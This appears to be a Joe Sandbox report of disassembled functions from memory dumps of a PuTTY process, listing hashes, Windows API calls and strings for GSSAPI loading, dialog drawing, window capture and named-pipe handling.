Opcode Fuzzy Hash: 7f2804403c51e157750d2287fcde7dd57b8ed0e5a056311132beea16f5df39e9
Instruction Fuzzy Hash: 8E324B74600A05CFCB28CF19C094A66B7E1FF88314F568AAEE95A4B395E731E854CF85

Function 00C0BA80 Relevance: .3, Instructions: 286COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49be8d32281f8e3e5507fbd32bba13b67eec0b32d0b26d0c9fe8ab8ab95eb540
Instruction ID: 99886f790f8f88e697dca5426c874ddcc5f2d762c2f13372387c3c409217cbb5
Opcode Fuzzy Hash: 49be8d32281f8e3e5507fbd32bba13b67eec0b32d0b26d0c9fe8ab8ab95eb540
Instruction Fuzzy Hash: 4791D472A047109FD720DE28CC8175AB7E1EF85321F098A2CE8A99B3D1E775ED05CB81

Function 00C2E800 Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f96859c0969731aceee050d733b3505b2ca5d9ab33f18e2d2ad4c10e5b61fe9d
Instruction ID: 1f3000d32fb041790a5bb25c46d8f273e387d8fb96ac0f9e43b8a9085f9abbb6
Opcode Fuzzy Hash: f96859c0969731aceee050d733b3505b2ca5d9ab33f18e2d2ad4c10e5b61fe9d
Instruction Fuzzy Hash: 1351E67490430997D630EA10EC83F9B77A8FB98308F508C38E585E72C2FA75A619D796

Function 00BAFA10 Relevance: .2, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fc8f4031a76baf7ef6c8bc9873ad2e177e0e76ddfcb0708ee670edb5fc8d3ff
Instruction ID: 4d28efbcbb5a816f5e5c0f9d19d6ef9e233bec4fcb74cc151b566220b76195a0
Opcode Fuzzy Hash: 4fc8f4031a76baf7ef6c8bc9873ad2e177e0e76ddfcb0708ee670edb5fc8d3ff
Instruction Fuzzy Hash: F441A572A083029FC710CF54C4D06AAB7F2EFDA354F6944A9D5885B301D332EC56CBA2

Function 00BAFD30 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b31d64dc57f71f00299236283ec6d5087ded94cf11ca3a3ceb8cd3906febd39
Instruction ID: b1008825ca0bbac3d1b636544f4d08f898af33ada8c5a23391ed183f4e4c4ee5
Opcode Fuzzy Hash: 9b31d64dc57f71f00299236283ec6d5087ded94cf11ca3a3ceb8cd3906febd39
Instruction Fuzzy Hash: A921C532A083016BD7229E95DC85BBBBBD1EF86354F0948BDE9CD57251E632DC40C742

Function 00BED700 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e0080e86e986d7c7de9666c6924855b9827055d0b5d746609a859327a09a20d
Instruction ID: f3eab0767654e5c5a63b5edb3561226d9952c46412a7020408872af3c9467e20
Opcode Fuzzy Hash: 0e0080e86e986d7c7de9666c6924855b9827055d0b5d746609a859327a09a20d
Instruction Fuzzy Hash: AE118EB56006418FCB24CF3CC9D0A76BBE5FF99324B158B6DE9968B384D770A804CB50

Function 00C0A440 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 080ed082e0d655431e00534caa2d5e3ad980a1cf8d970c01362c7349ac3004f1
Instruction ID: 8d918679ca87f91f1f802d58017393be1e3cea401357cd59df1fabf38b7297cf
Opcode Fuzzy Hash: 080ed082e0d655431e00534caa2d5e3ad980a1cf8d970c01362c7349ac3004f1
Instruction Fuzzy Hash: 8DF04CB2A003056FD3205E64EC85B56F7D4EBD1711F044029E584973C1F570A808C7A5

Function 00BDFA50 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bffc3cbd8709390c9e5b1f4dfb70adc70d000a6cf7ac77857b49005f4c2a3af
Instruction ID: 1aebafddd9e49410a79ca16eb5cc416d7bec04d40f12eb654e0e7cf24f488542
Opcode Fuzzy Hash: 0bffc3cbd8709390c9e5b1f4dfb70adc70d000a6cf7ac77857b49005f4c2a3af
Instruction Fuzzy Hash: 86F081B69006419BDB206E12EC42A17F3F9AB42758F0944B6E40B57312F732F918D666

Function 00BECF90 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 279f7eb8e6c167c4409cab0f2abcd02a44e999263011f89c71bc761125bf0a14
Instruction ID: 1c7029979809904741a51afba926d805542267a9a25fd0e66913757e8957b8a4
Opcode Fuzzy Hash: 279f7eb8e6c167c4409cab0f2abcd02a44e999263011f89c71bc761125bf0a14
Instruction Fuzzy Hash: 85C0123080672056DA304E05BC047D7FAF99F53354F001444FC4563245D370D59985D9

Function 00BF0D70 Relevance: 126.4, APIs: 42, Strings: 30, Instructions: 400libraryloaderregistryCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,AddDllDirectory), ref: 00BF0DBB
RegOpenKeyA.ADVAPI32(80000002,SOFTWARE\MIT\Kerberos,?), ref: 00BF0DED
RegQueryValueExA.ADVAPI32(?,InstallDir,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00BF0E16
RegQueryValueExA.ADVAPI32(?,InstallDir,00000000,?,00000000,?), ref: 00BF0E53
_strlen.LIBCMT ref: 00BF0E6F
_strlen.LIBCMT ref: 00BF0EAC
LoadLibraryExA.KERNEL32(00000000,00000000,00000D00), ref: 00BF0EDA
RegCloseKey.ADVAPI32(?), ref: 00BF0F46
GetProcAddress.KERNEL32(00000000,gss_delete_sec_context), ref: 00BF0F88
GetProcAddress.KERNEL32(00000000,gss_display_status), ref: 00BF0F94
GetProcAddress.KERNEL32(00000000,gss_get_mic), ref: 00BF0FA0
GetProcAddress.KERNEL32(00000000,gss_verify_mic), ref: 00BF0FAC
GetProcAddress.KERNEL32(00000000,gss_import_name), ref: 00BF0FB8
GetProcAddress.KERNEL32(00000000,gss_init_sec_context), ref: 00BF0FC4
GetProcAddress.KERNEL32(00000000,gss_release_buffer), ref: 00BF0FD0
GetProcAddress.KERNEL32(00000000,gss_release_cred), ref: 00BF0FDC
GetProcAddress.KERNEL32(00000000,gss_release_name), ref: 00BF0FE8
GetProcAddress.KERNEL32(00000000,gss_acquire_cred), ref: 00BF0FF4
GetProcAddress.KERNEL32(00000000,gss_inquire_cred_by_mech), ref: 00BF1000
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00BC7A80,?), ref: 00BF101B
FreeLibrary.KERNEL32(00000000), ref: 00BF0F0E

Part of subcall function 00BDBFB0: LoadLibraryA.KERNELBASE(00000000,00000000,?,00BEA190,kernel32.dll), ref: 00BDBFCF

GetProcAddress.KERNEL32(00000000,AcquireCredentialsHandleA), ref: 00BF106A
GetProcAddress.KERNEL32(00000000,InitializeSecurityContextA), ref: 00BF1077
GetProcAddress.KERNEL32(00000000,FreeContextBuffer), ref: 00BF1084
GetProcAddress.KERNEL32(00000000,FreeCredentialsHandle), ref: 00BF1091
GetProcAddress.KERNEL32(00000000,DeleteSecurityContext), ref: 00BF109E
GetProcAddress.KERNEL32(00000000,QueryContextAttributesA), ref: 00BF10AB
GetProcAddress.KERNEL32(00000000,MakeSignature), ref: 00BF10B8
GetProcAddress.KERNEL32(00000000,VerifySignature), ref: 00BF10C5
_strlen.LIBCMT ref: 00BF114C
LoadLibraryExA.KERNEL32(?,00000000,00000D00,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00BF11C7
GetProcAddress.KERNEL32(00000000,gss_delete_sec_context), ref: 00BF1215
GetProcAddress.KERNEL32(00000000,gss_display_status), ref: 00BF1221
GetProcAddress.KERNEL32(00000000,gss_get_mic), ref: 00BF122D
GetProcAddress.KERNEL32(00000000,gss_verify_mic), ref: 00BF1239
GetProcAddress.KERNEL32(00000000,gss_import_name), ref: 00BF1245
GetProcAddress.KERNEL32(00000000,gss_init_sec_context), ref: 00BF1251
GetProcAddress.KERNEL32(00000000,gss_release_buffer), ref: 00BF125D
GetProcAddress.KERNEL32(00000000,gss_release_cred), ref: 00BF1269
GetProcAddress.KERNEL32(00000000,gss_release_name), ref: 00BF1275
GetProcAddress.KERNEL32(00000000,gss_acquire_cred), ref: 00BF1281
GetProcAddress.KERNEL32(00000000,gss_inquire_cred_by_mech), ref: 00BF128D

Strings

gss_init_sec_context, xrefs: 00BF0FBE, 00BF124B
secur32.dll, xrefs: 00BF1025
gss_inquire_cred_by_mech, xrefs: 00BF0FFA, 00BF1287
Using GSSAPI from user-specified library '%s', xrefs: 00BF11F4
gss_verify_mic, xrefs: 00BF0FA6, 00BF1233
l, xrefs: 00BF0ECB
gss_import_name, xrefs: 00BF0FB2, 00BF123F
AddDllDirectory, xrefs: 00BF0DB5
gss_get_mic, xrefs: 00BF0F9A, 00BF1227
gss_release_cred, xrefs: 00BF0FD6, 00BF1263
gss_release_buffer, xrefs: 00BF0FCA, 00BF1257
FreeContextBuffer, xrefs: 00BF107E
%.*s, xrefs: 00BF1188
gss_delete_sec_context, xrefs: 00BF0F82, 00BF120F
InstallDir, xrefs: 00BF0E0D, 00BF0E4A
api3, xrefs: 00BF0EBB
QueryContextAttributesA, xrefs: 00BF10A5
MakeSignature, xrefs: 00BF10B2
kernel32.dll, xrefs: 00BF0D9B
gss_release_name, xrefs: 00BF0FE2, 00BF126F
DeleteSecurityContext, xrefs: 00BF1098
VerifySignature, xrefs: 00BF10BF
2.dl, xrefs: 00BF0EC3
gss_acquire_cred, xrefs: 00BF0FEE, 00BF127B
WVj, xrefs: 00BF10F4
InitializeSecurityContextA, xrefs: 00BF1071
gss_display_status, xrefs: 00BF0F8E, 00BF121B
SOFTWARE\MIT\Kerberos, xrefs: 00BF0DE3
AcquireCredentialsHandleA, xrefs: 00BF1064
FreeCredentialsHandle, xrefs: 00BF108B

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: AddressProc$Library$Load_strlen$CloseQueryValue$FreeOpen
String ID: %.*s$2.dl$AcquireCredentialsHandleA$AddDllDirectory$DeleteSecurityContext$FreeContextBuffer$FreeCredentialsHandle$InitializeSecurityContextA$InstallDir$MakeSignature$QueryContextAttributesA$SOFTWARE\MIT\Kerberos$Using GSSAPI from user-specified library '%s'$VerifySignature$WVj$api3$gss_acquire_cred$gss_delete_sec_context$gss_display_status$gss_get_mic$gss_import_name$gss_init_sec_context$gss_inquire_cred_by_mech$gss_release_buffer$gss_release_cred$gss_release_name$gss_verify_mic$kernel32.dll$l$secur32.dll
API String ID: 3724305165-1250506787
Opcode ID: df82086fddb31dd59e09e152e83699b2d80c22b1b35de79e320dad007eb9bfd0
Instruction ID: fe1a3f37c16ce4abc1f8c1d25fa72423778f9fa8b406c636e35e02c49001dadd
Opcode Fuzzy Hash: df82086fddb31dd59e09e152e83699b2d80c22b1b35de79e320dad007eb9bfd0
Instruction Fuzzy Hash: 90D1B5B0900308BFD710AF649C86B3A7BE8EB45B4CF00447DFD499B296E7B4D9049B5A

Function 00BBEC10 Relevance: 72.1, APIs: 39, Strings: 2, Instructions: 367windowCOMMON

Download Yara Rule

APIs

SetDlgItemTextA.USER32(?,00000063,?), ref: 00BBEC7E
GetWindowLongA.USER32(?,000000F4), ref: 00BBECB0
SetBkMode.GDI32(?,00000001), ref: 00BBECCC
GetStockObject.GDI32(0000000D), ref: 00BBECD4
SelectObject.GDI32(?,00000000), ref: 00BBECDC
GetObjectA.GDI32(00000000,0000003C,?), ref: 00BBECEA
CreateFontIndirectA.GDI32(?), ref: 00BBED11
SelectObject.GDI32(?,00000000), ref: 00BBED1D
GetSysColorBrush.USER32(0000000F), ref: 00BBED25
SetDlgItemTextA.USER32(?,00000064,00000000), ref: 00BBEDB4
SetWindowTextA.USER32(?,00000000), ref: 00BBEDD0
GetDlgItem.USER32(?,00000063), ref: 00BBEDDF
DestroyWindow.USER32(00000000), ref: 00BBEDEA
SendDlgItemMessageA.USER32(?,00000064,000000BA,00000000,00000000), ref: 00BBEDFC
MapDialogRect.USER32(?,00000028), ref: 00BBEE40
GetDlgItem.USER32(?,00000064), ref: 00BBEE66
GetDlgItem.USER32(?,00000002), ref: 00BBEE91
MapDialogRect.USER32(?,00000120), ref: 00BBEEBD
GetDlgItem.USER32(?,000003E9), ref: 00BBEEDD
MapDialogRect.USER32(?,000000A8), ref: 00BBEF07
SetWindowPos.USER32(00000000,00000000,?,?,00000000,00000000,0000000D), ref: 00BBEF1A
GetDlgItem.USER32(?,000003E8), ref: 00BBEF26
SetWindowPos.USER32(00000000,00000000,?,?,00000000,00000000,0000000D), ref: 00BBEF68
GetDlgItem.USER32(?,000003EC), ref: 00BBEF74
MapDialogRect.USER32(?,0000003C), ref: 00BBEF9E
SetWindowPos.USER32(00000000,00000000,?,?,00000000,00000000,0000000D), ref: 00BBEFB5
GetDlgItem.USER32(?,00000009), ref: 00BBEFBE
MapDialogRect.USER32(?,0000003C), ref: 00BBEFE4
SetWindowPos.USER32(00000000,00000000,?,?,00000000,00000000,0000000D), ref: 00BBF001
MapDialogRect.USER32(?,0000003C), ref: 00BBF029
GetWindowRect.USER32(?,0000003C), ref: 00BBF065
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,?,0000000E), ref: 00BBF088
GetSystemMetrics.USER32(0000000C), ref: 00BBF096
GetSystemMetrics.USER32(0000000B), ref: 00BBF09C
LoadImageA.USER32(00000000,?,00000001,00000000,00000000,00008000), ref: 00BBF0AD
SendDlgItemMessageA.USER32(?,00000062,00000170,00000000,00000000), ref: 00BBF0BE
GetDlgItem.USER32(?,00000009), ref: 00BBF0D0
DestroyWindow.USER32(00000000), ref: 00BBF0DB
ShowWindow.USER32(?,00000001), ref: 00BBF0E4

Strings

<, xrefs: 00BBEF7C
PuTTYHostKeyMoreInfo, xrefs: 00BBED61

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: Item$Window$Rect$Dialog$Object$Text$DestroyMessageMetricsSelectSendSystem$BrushColorCreateFontImageIndirectLoadLongModeShowStock
String ID: <$PuTTYHostKeyMoreInfo
API String ID: 3197394372-974962811
Opcode ID: c3230786e103d2da804dd65f24fce615e4b4e6ff53cb175a925f65d2c560861e
Instruction ID: 540615ebd8de1b2fe4560c2d56bc72808330a9753cae59cdec9ca28a8ba8f96e
Opcode Fuzzy Hash: c3230786e103d2da804dd65f24fce615e4b4e6ff53cb175a925f65d2c560861e
Instruction Fuzzy Hash: 3DD16171544305AFE7209F24DC49F6FBBE9FB88B04F10486DF645A62A1CBB4D905CBA2

Function 00BDC580 Relevance: 56.3, APIs: 20, Strings: 12, Instructions: 267windowlibraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,DwmGetWindowAttribute), ref: 00BDC5B7
GetDC.USER32(00000000), ref: 00BDC5C8
GetCurrentObject.GDI32(00000000,00000007), ref: 00BDC647
GetObjectA.GDI32(00000000,00000018,00000000), ref: 00BDC655
CreateCompatibleDC.GDI32(00000000), ref: 00BDC673
CreateCompatibleBitmap.GDI32(00000000,00000000,00000000), ref: 00BDC686
SelectObject.GDI32(00000000,00000000), ref: 00BDC6A0
BitBlt.GDI32(00000000,00000000,00000000,00000000,00000000,?,?,?,00CC0020), ref: 00BDC6C7
GetDIBits.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00BDC751
GetLastError.KERNEL32 ref: 00BDC75F

Part of subcall function 00BDBFB0: LoadLibraryA.KERNELBASE(00000000,00000000,?,00BEA190,kernel32.dll), ref: 00BDBFCF

GetLastError.KERNEL32 ref: 00BDC7F9

Part of subcall function 00BDD3E0: FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,0000FFFF,00000000,?,?,?,?,00BD711E,?), ref: 00BDD46B
Part of subcall function 00BDD3E0: _strlen.LIBCMT ref: 00BDD476

ReleaseDC.USER32(00000000,?), ref: 00BDC8DE
DeleteObject.GDI32(?), ref: 00BDC8E8
DeleteObject.GDI32(00000000), ref: 00BDC8EF

Strings

SelectObject: %s, xrefs: 00BDC88C
BM, xrefs: 00BDC79B
(, xrefs: 00BDC708
GetDC(window): %s, xrefs: 00BDC80B
CreateCompatibleBitmap: %s, xrefs: 00BDC85E
6, xrefs: 00BDC7AD
DwmGetWindowAttribute, xrefs: 00BDC5B1
BitBlt: %s, xrefs: 00BDC8B5
'%s': unable to open file, xrefs: 00BDC8C9
CreateCompatibleDC(desktop window dc): %s, xrefs: 00BDC82F
GetDIBits (get data): %s, xrefs: 00BDC76F
dwmapi.dll, xrefs: 00BDC59B

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: Object$CompatibleCreateDeleteErrorLast$AddressBitmapBitsCurrentFormatLibraryLoadMessageProcReleaseSelect_strlen
String ID: '%s': unable to open file$($6$BM$BitBlt: %s$CreateCompatibleBitmap: %s$CreateCompatibleDC(desktop window dc): %s$DwmGetWindowAttribute$GetDC(window): %s$GetDIBits (get data): %s$SelectObject: %s$dwmapi.dll
API String ID: 422774641-2800384791
Opcode ID: e75278cdfeaf37b24f7cd732f14d0bf60ca6e53955e7f4e1f840849914527450
Instruction ID: 7fc32514d20284ddc52a7810a079ae14316a38539a75cccf00ff11b5cd441e48
Opcode Fuzzy Hash: e75278cdfeaf37b24f7cd732f14d0bf60ca6e53955e7f4e1f840849914527450
Instruction Fuzzy Hash: DF91A2B1544301AFE310AF61EC49F2FBAE8EB84745F04042DF949D6392FBB59904DBA6

Function 00BA1B7F Relevance: 40.4, APIs: 21, Strings: 2, Instructions: 173windowCOMMON

Download Yara Rule

APIs

HideCaret.USER32 ref: 00BA1B80
BeginPaint.USER32(?,?), ref: 00BA1B8F
SelectPalette.GDI32(00000000,?,00000001), ref: 00BA1BA4
RealizePalette.GDI32(00000000), ref: 00BA1BAB
CreateSolidBrush.GDI32 ref: 00BA1CCF
SelectObject.GDI32(?,00000000), ref: 00BA1CE5
CreatePen.GDI32(00000000,00000000), ref: 00BA1CF3
SelectObject.GDI32(?,00000000), ref: 00BA1CFD
IntersectClipRect.GDI32(?,?,?,?,?), ref: 00BA1D20
ExcludeClipRect.GDI32(?,?,?,?,?), ref: 00BA1D5A
Rectangle.GDI32(?,?,?,?,?), ref: 00BA1D7D
SelectObject.GDI32(?,00000000), ref: 00BA1D8B
DeleteObject.GDI32(?), ref: 00BA1D97
SelectObject.GDI32(?,?), ref: 00BA1D9E
DeleteObject.GDI32(00000000), ref: 00BA1DA1
GetStockObject.GDI32(0000000D), ref: 00BA1DAB
SelectObject.GDI32(?,00000000), ref: 00BA1DB9
GetStockObject.GDI32(00000006), ref: 00BA1DBD
SelectObject.GDI32(?,00000000), ref: 00BA1DC1
EndPaint.USER32(?,?), ref: 00BA1DD3
ShowCaret.USER32(?), ref: 00BA1DDA

Strings

/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/window.c, xrefs: 00BA1BBF
!wintw_hdc, xrefs: 00BA1BC4

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: Object$Select$CaretClipCreateDeletePaintPaletteRectStock$BeginBrushExcludeHideIntersectRealizeRectangleShowSolid
String ID: !wintw_hdc$/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/window.c
API String ID: 4109966220-2668247132
Opcode ID: 28f40feae0c3999ed84f5a128d305c70c96346f9cf007222844fca806440f8bc
Instruction ID: 97b226a8cbca42214a12e04a72a74287119825c844f87407a315c5184a538888
Opcode Fuzzy Hash: 28f40feae0c3999ed84f5a128d305c70c96346f9cf007222844fca806440f8bc
Instruction Fuzzy Hash: 64617EB2104240AFD710DF64ED89F6EBBE9FB8A314F04442DF649C7221CB756952DB52

Function 00C30700 Relevance: 40.4, APIs: 14, Strings: 9, Instructions: 138filepipeCOMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 00C30744
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,40000000,00000000,?,?,?,?,?,00C308C8,?), ref: 00C30785
GetLastError.KERNEL32(?,?,?,?,?,00C308C8,?), ref: 00C3078C
WaitNamedPipeA.KERNEL32(?,00000000), ref: 00C3079A
GetLastError.KERNEL32(?,?,?,?,?,00C308C8,?), ref: 00C307A4

Part of subcall function 00BDCA80: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,75295780,00BDCEC7), ref: 00BDCAB7
Part of subcall function 00BDCA80: OpenProcess.KERNEL32(02000000,00000000,00000000,?,?,?,?,?,?,?,?,75295780,00BDCEC7), ref: 00BDCAC5
Part of subcall function 00BDCA80: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,75295780,00BDCEC7), ref: 00BDCB04
Part of subcall function 00BDCA80: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,75295780,00BDCEC7), ref: 00BDCB21
Part of subcall function 00BDCA80: GetLengthSid.ADVAPI32(00000000,?,?,?,?,?,?,?,?,75295780,00BDCEC7), ref: 00BDCB4B
